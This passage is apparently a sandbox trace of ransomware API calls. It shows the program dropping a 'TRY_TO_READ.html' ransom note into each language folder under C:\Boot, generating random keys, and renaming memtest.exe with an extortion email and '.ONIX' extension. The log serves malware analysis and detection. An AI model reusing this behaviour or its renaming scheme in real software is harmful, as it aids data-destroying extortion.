(HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.266] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\TRY_TO_READ.html" (normalized: "c:\\boot\\ja-jp\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.267] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.269] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.269] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.269] CloseHandle (hObject=0x3dc) returned 1 [0065.270] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.270] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.270] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.270] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce78 | out: hHeap=0x410000) returned 1 [0065.270] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0065.270] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.270] GetLastError () returned 0x0 [0065.270] SetLastError (dwErrCode=0x0) [0065.270] GetLastError () returned 0x0 [0065.270] SetLastError (dwErrCode=0x0) [0065.270] GetLastError () returned 0x0 [0065.270] SetLastError (dwErrCode=0x0) [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce78 [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cea0 [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cec8 [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.270] GetLastError () returned 0x0 [0065.270] SetLastError (dwErrCode=0x0) [0065.270] GetLastError () returned 0x0 [0065.270] SetLastError (dwErrCode=0x0) [0065.270] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.270] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\TRY_TO_READ.html" (normalized: "c:\\boot\\ko-kr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.271] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.271] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.272] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.272] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.272] CloseHandle (hObject=0x3dc) returned 1 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cec8 | out: hHeap=0x410000) returned 1 [0065.273] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.273] GetLastError () returned 0x0 [0065.273] SetLastError (dwErrCode=0x0) [0065.273] GetLastError () returned 0x0 [0065.273] SetLastError (dwErrCode=0x0) [0065.273] GetLastError () returned 0x0 [0065.273] SetLastError (dwErrCode=0x0) [0065.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cec8 [0065.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cec8 | out: hHeap=0x410000) returned 1 [0065.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47f380 [0065.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.273] CreateFileW (lpFileName="C:\\\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.273] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.274] CreateFileW (lpFileName="C:\\\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.274] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.274] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x47f380 | out: pbBuffer=0x47f380) returned 1 [0065.274] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665a8 | out: pbBuffer=0x4665a8) returned 1 [0065.274] SetFileAttributesW (lpFileName="C:\\\\Boot\\memtest.exe", dwFileAttributes=0x80) returned 0 [0065.274] lstrlenW (lpString="C:\\\\Boot\\memtest.exe") returned 20 [0065.274] GetProcessHeap () returned 0x410000 [0065.274] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x98) returned 0x43e3f8 [0065.274] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\memtest.exe" | out: lpString1="C:\\\\Boot\\memtest.exe") returned="C:\\\\Boot\\memtest.exe" [0065.274] lstrcatW (in: lpString1="C:\\\\Boot\\memtest.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\memtest.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\memtest.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.274] GetProcessHeap () returned 0x410000 [0065.274] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.274] CloseHandle (hObject=0xffffffff) returned 0 [0065.274] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.274] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0065.274] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.274] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.274] GetLastError () returned 0x6 [0065.274] SetLastError (dwErrCode=0x6) [0065.274] GetLastError () returned 0x6 [0065.274] SetLastError (dwErrCode=0x6) [0065.274] GetLastError () returned 0x6 [0065.274] SetLastError (dwErrCode=0x6) [0065.275] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cec8 [0065.275] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cef0 [0065.275] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf18 [0065.275] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.275] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.275] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.275] GetLastError () returned 0x6 [0065.275] SetLastError (dwErrCode=0x6) [0065.275] GetLastError () returned 0x6 [0065.275] SetLastError (dwErrCode=0x6) [0065.275] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.275] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\TRY_TO_READ.html" (normalized: "c:\\boot\\nb-no\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.275] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.275] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.276] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.276] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.276] CloseHandle (hObject=0x3dc) returned 1 [0065.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.277] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf18 | out: hHeap=0x410000) returned 1 [0065.277] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0065.277] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.277] GetLastError () returned 0x0 [0065.277] SetLastError (dwErrCode=0x0) [0065.277] GetLastError () returned 0x0 [0065.277] SetLastError (dwErrCode=0x0) [0065.277] GetLastError () returned 0x0 [0065.277] SetLastError (dwErrCode=0x0) [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf18 [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf40 [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf68 [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.277] GetLastError () returned 0x0 [0065.277] SetLastError (dwErrCode=0x0) [0065.277] GetLastError () returned 0x0 [0065.277] SetLastError (dwErrCode=0x0) [0065.277] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.277] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\TRY_TO_READ.html" (normalized: "c:\\boot\\nl-nl\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.278] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.279] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.279] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.279] CloseHandle (hObject=0x3dc) returned 1 [0065.280] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.280] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.280] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.280] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf68 | out: hHeap=0x410000) returned 1 [0065.280] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0065.280] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.280] GetLastError () returned 0x0 [0065.280] SetLastError (dwErrCode=0x0) [0065.280] GetLastError () returned 0x0 [0065.280] SetLastError (dwErrCode=0x0) [0065.280] GetLastError () returned 0x0 [0065.280] SetLastError (dwErrCode=0x0) [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf68 [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf90 [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cfb8 [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.280] GetLastError () returned 0x0 [0065.280] SetLastError (dwErrCode=0x0) [0065.280] GetLastError () returned 0x0 [0065.280] SetLastError (dwErrCode=0x0) [0065.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.280] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\TRY_TO_READ.html" (normalized: "c:\\boot\\pl-pl\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.281] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.282] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.282] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.282] CloseHandle (hObject=0x3dc) returned 1 [0065.282] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.282] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.282] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.282] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfb8 | out: hHeap=0x410000) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0065.282] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.282] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.282] GetLastError () returned 0x0 [0065.282] SetLastError (dwErrCode=0x0) [0065.282] GetLastError () returned 0x0 [0065.282] SetLastError (dwErrCode=0x0) [0065.282] GetLastError () returned 0x0 [0065.282] SetLastError (dwErrCode=0x0) [0065.282] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cfb8 [0065.282] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cfe0 [0065.282] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d008 [0065.282] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.283] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.283] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.283] GetLastError () returned 0x0 [0065.283] SetLastError (dwErrCode=0x0) [0065.283] GetLastError () returned 0x0 [0065.283] SetLastError (dwErrCode=0x0) [0065.283] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.283] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\TRY_TO_READ.html" (normalized: "c:\\boot\\pt-br\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.284] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.284] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.285] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.285] CloseHandle (hObject=0x3dc) returned 1 [0065.285] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.285] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.285] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.285] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d008 | out: hHeap=0x410000) returned 1 [0065.285] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0065.285] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.285] GetLastError () returned 0x0 [0065.285] SetLastError (dwErrCode=0x0) [0065.285] GetLastError () returned 0x0 [0065.285] SetLastError (dwErrCode=0x0) [0065.285] GetLastError () returned 0x0 [0065.285] SetLastError (dwErrCode=0x0) [0065.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d008 [0065.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d030 [0065.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d058 [0065.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.285] GetLastError () returned 0x0 [0065.286] SetLastError (dwErrCode=0x0) [0065.286] GetLastError () returned 0x0 [0065.286] SetLastError (dwErrCode=0x0) [0065.286] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.286] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\TRY_TO_READ.html" (normalized: "c:\\boot\\pt-pt\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.286] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.286] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.287] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.287] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, 